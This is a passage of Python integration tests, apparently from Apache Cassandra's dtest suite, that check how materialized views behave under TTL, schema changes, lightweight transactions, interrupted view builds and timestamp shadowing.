assert len(rows) == 1000, "Expected 1000 rows but got {}".format(len(rows))
assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(i),
[i, i, 'a', 3.0]
)
assert_one(
session,
"SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(i),
['a', i, i, 3.0]
)
def test_secondary_index(self):
"""Test that secondary indexes cannot be created on a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
assert_invalid(session, "CREATE INDEX ON t_by_v (v2)",
"Secondary indexes are not supported on materialized views")
def test_ttl(self):
"""
Test that TTL works as expected for a materialized view
@expected_result The TTL is propagated properly between tables.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(100):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=i))
for i in range(100):
assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(i), [i, i, i, i])
time.sleep(20)
rows = list(session.execute("SELECT * FROM t_by_v2"))
assert len(rows) == 0, "Expected 0 rows but got {}".format(len(rows))
def test_query_all_new_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when adding a new column
@expected_result The new column is present in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'first_name'), 'Column "first_name" not found'
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None]
)
def test_query_new_column(self):
"""
Test that a materialized view created with 'SELECT <col1, ...>' works as expected when adding a new column
@expected_result The new column is not present in the view.
"""
session = self.prepare(user_table=True)
session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT state, username FROM users "
"WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert not hasattr(results[0], 'first_name'), 'Column "first_name" found in view'
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
def test_rename_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when renaming a column
@expected_result The column is also renamed in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users RENAME username TO user")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND user = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'user'), 'Column "user" not found'
assert_one(
session,
"SELECT state, user, birth_year, gender FROM users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f']
)
def test_rename_column_atomicity(self):
"""
Test that column renaming is atomically done between a table and its materialized views
@jira_ticket CASSANDRA-12952
"""
session = self.prepare(nodes=1, user_table=True, install_byteman=True)
node = self.cluster.nodelist()[0]
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
# Rename a column with an injected byteman rule to kill the node after the first schema update
self.fixture_dtest_setup.allow_log_errors = True
script_version = '4x' if self.cluster.version() >= '4' else '3x'
node.byteman_submit(['./byteman/merge_schema_failure_{}.btm'.format(script_version)])
with pytest.raises(NoHostAvailable):
session.execute("ALTER TABLE users RENAME username TO user")
logger.debug('Restarting node')
node.stop()
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
# Both the table and its view should have the new schema after restart
assert_one(
session,
"SELECT * FROM ks.users WHERE state = 'TX' AND user = 'user1' ALLOW FILTERING",
['user1', 1968, 'f', 'ch@ngem3a', None, 'TX']
)
assert_one(
session,
"SELECT * FROM ks.users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
def test_lwt(self):
"""Test that lightweight transaction behave properly with a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Inserting initial data using IF NOT EXISTS")
for i in range(1000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
self._replay_batchlogs()
logger.debug("All rows should have been inserted")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Tyring to UpInsert data with a different value using IF NOT EXISTS")
for i in range(1000):
v = i * 2
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("No rows should have changed")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Update the 10 first rows with a different value")
for i in range(1000):
v = i + 2000
session.execute(
"UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows changed.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 1000
for i in range(1000):
v = i + 2000 if i < 10 else i
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(v),
[v, i, 'a', 3.0]
)
logger.debug("Deleting the first 10 rows")
for i in range(1000):
v = i + 2000
session.execute(
"DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows have been deleted.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 990
for i in range(10, 1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
def test_interrupt_build_process(self):
"""Test that an interrupted MV build process is resumed as it should"""
options = {'hinted_handoff_enabled': False}
if self.cluster.version() >= '4':
options['concurrent_materialized_view_builders'] = 4
session = self.prepare(options=options, install_byteman=True)
node1, node2, node3 = self.cluster.nodelist()
logger.debug("Avoid premature MV build finalization with byteman")
for node in self.cluster.nodelist():
if self.cluster.version() >= '4':
node.byteman_submit(['./byteman/4.0/skip_view_build_finalization.btm'])
node.byteman_submit(['./byteman/4.0/skip_view_build_task_finalization.btm'])
else:
node.byteman_submit(['./byteman/pre4.0/skip_finish_view_build_status.btm'])
node.byteman_submit(['./byteman/pre4.0/skip_view_build_update_distributed.btm'])
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(10000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stop the cluster. Interrupt the MV build process.")
self.cluster.stop()
logger.debug("Checking logs to verify that the view build tasks have been created")
for node in self.cluster.nodelist():
assert node.grep_log('Starting new view build', filename='debug.log')
assert not node.grep_log('Resuming view build', filename='debug.log')
node.mark_log(filename='debug.log')
logger.debug("Restart the cluster")
self.cluster.start()
session = self.patient_cql_connection(node1)
session.execute("USE ks")
logger.debug("MV shouldn't be built yet.")
assert len(list(session.execute("SELECT COUNT(*) FROM t_by_v"))) != 10000
logger.debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
self._wait_for_view("ks", "t_by_v")
logger.debug("Verify all data")
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [10000])
for i in range(10000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug("Checking logs to verify that some view build tasks have been resumed")
for node in self.cluster.nodelist():
assert node.grep_log('Resuming view build', filename='debug.log')
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('4.0')
def test_drop_while_building(self):
"""Test that a parallel MV build is interrupted when the view is removed"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in self.cluster.nodelist():
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in self.cluster.nodelist():
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
self.assertTrue(failed, "The view shouldn't be queryable")
self._assert_view_meta(session, views=1, exists=False)
logger.debug("Create the MV again")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_drop_with_stopped_build(self):
"""Test that MV whose build has been stopped with `nodetool stop` can be dropped"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
self.check_logs_for_errors()
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in nodes:
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
assert failed, "The view shouldn't be queryable"
logger.debug("Create the MV again")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_resume_stopped_build(self):
"""Test that MV builds stopped with `nodetool stop` are resumed after restart"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
node.watch_log_for('Interrupted build for view', filename='debug.log', timeout=120)
assert not node.grep_log('Marking view', filename='debug.log')
self.check_logs_for_errors()
logger.debug("Check that MV shouldn't be built yet.")
assert len(list(session.execute("SELECT COUNT(*) FROM t_by_v"))) != 5000
logger.debug("Restart the cluster")
self.cluster.stop()
marks = [node.mark_log() for node in nodes]
self.cluster.start()
session = self.patient_cql_connection(nodes[0])
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM ks.t_by_v", [5000])
logger.debug("Checking logs to verify that the view build has been resumed and completed after restart")
for node, mark in zip(nodes, marks):
assert node.grep_log('Resuming view build', filename='debug.log', from_mark=mark)
assert node.grep_log('Marking view', filename='debug.log', from_mark=mark)
self.check_logs_for_errors()
@since('3.0')
def test_mv_with_default_ttl_with_flush(self):
self._test_mv_with_default_ttl(True)
@since('3.0')
def test_mv_with_default_ttl_without_flush(self):
self._test_mv_with_default_ttl(False)
def _test_mv_with_default_ttl(self, flush):
"""
Verify mv with default_time_to_live can be deleted properly using expired livenessInfo
@jira_ticket CASSANDRA-14071
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
logger.debug("MV with same key and unselected columns")
session.execute("CREATE TABLE t2 (k int, a int, b int, c int, primary key(k, a)) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv2 AS SELECT k,a,b FROM t2 "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (a, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
self.update_view(session, "UPDATE t2 SET c=1 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 1])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "UPDATE t2 SET c=null WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
self.update_view(session, "UPDATE t2 SET c=2 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 2])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "DELETE c FROM t2 WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
# test with user-provided ttl
self.update_view(session, "INSERT INTO t2(k,a,b,c) VALUES(2,2,2,2) USING TTL 5", flush)
self.update_view(session, "UPDATE t2 USING TTL 100 SET c=1 WHERE k=2 AND a=2;", flush)
self.update_view(session, "UPDATE t2 USING TTL 50 SET c=2 WHERE k=2 AND a=2;", flush)
self.update_view(session, "DELETE c FROM t2 WHERE k=2 AND a=2;", flush)
time.sleep(5)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
logger.debug("MV with extra key")
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 2, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 2, 1])
assert_one(session, "SELECT * FROM mv", [1, 2, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 3, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
# user provided ttl
self.update_view(session, "UPDATE t USING TTL 50 SET a = 4 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 4, 1])
assert_one(session, "SELECT * FROM mv", [1, 4, 1])
self.update_view(session, "UPDATE t USING TTL 40 SET a = 5 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 5, 1])
assert_one(session, "SELECT * FROM mv", [1, 5, 1])
self.update_view(session, "UPDATE t USING TTL 30 SET a = 6 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
@flaky
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=True)
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_no_base_column_in_view_pk_complex_timestamp(self, flush):
"""
Able to shadow old view row if all columns in base are removed including unselected
Able to recreate view row if at least one selected column alive
@jira_ticket CASSANDRA-11500
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT k,c,a,b FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 1 SET e=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, 1, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected column, view row is removed
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# update unselected with ts=3, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# insert livenesssInfo, view row should be alive
self.update_view(session, "INSERT INTO t(k,c) VALUES(1,1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be alive because of base livenessInfo alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=null WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# delete with ts=3, view row should be alive due to unselected@ts4
self.update_view(session, "DELETE FROM t USING TIMESTAMP 3 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be removed
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# add selected with ts=7, view row is alive
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected with ts=7, view row is dead
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# add selected with ts=5, view row is alive (selected column should not affects each other)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# add selected with ttl=20 (we apparently need a long ttl because the flushing etc that self.update_view does can take a long time)
self.update_view(session, "UPDATE t USING TTL 20 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
time.sleep(20)
# update unselected with ttl=10, view row should be alive
self.update_view(session, "UPDATE t USING TTL 20 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
time.sleep(20)
# view row still alive due to base livenessInfo
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=True)
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_base_column_in_view_pk_complex_timestamp(self, flush):
"""
Able to shadow old view row with column ts greater than pk's ts and re-insert the view row
Able to shadow old view row with column ts smaller than pk's ts and re-insert the view row
@jira_ticket CASSANDRA-11500
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=1
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
# increase b ts to 10
self.update_view(session, "UPDATE t USING TIMESTAMP 10 SET b = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET a = 2 WHERE k = 1;", flush, compact=True)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# able to shadow view row even if base-column in view pk's ts is smaller than row timestamp
# set row TS = 20, a@6, b@20
self.update_view(session, "DELETE FROM t USING TIMESTAMP 5 where k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, None, 2, 10])
assert_none(session, "SELECT k,a,b,writetime(b) FROM mv")
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 6;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
self.update_view(session, "INSERT INTO t (k, b) VALUES (1, 1) USING TIMESTAMP 20;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 1, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 2, 1, 7, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 1, 20])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 8 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 1, 1, 8, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# create another view row
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (2, 2, 2);", flush)
assert_one(session, "SELECT k,a,b FROM t WHERE k = 2", [2, 2, 2])
assert_one(session, "SELECT k,a,b FROM mv WHERE k = 2", [2, 2, 2])
# stop node2, node3
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
logger.debug('Shutdown node3')
node3.stop(wait_other_notice=True)
# shadow a = 1, create a = 2
query = SimpleStatement("UPDATE t USING TIMESTAMP 9 SET a = 2 WHERE k = 1", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
# shadow (a=2, k=2) after 3 second
query = SimpleStatement("UPDATE t USING TTL 3 SET a = 2 WHERE k = 2", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
logger.debug('Starting node2')
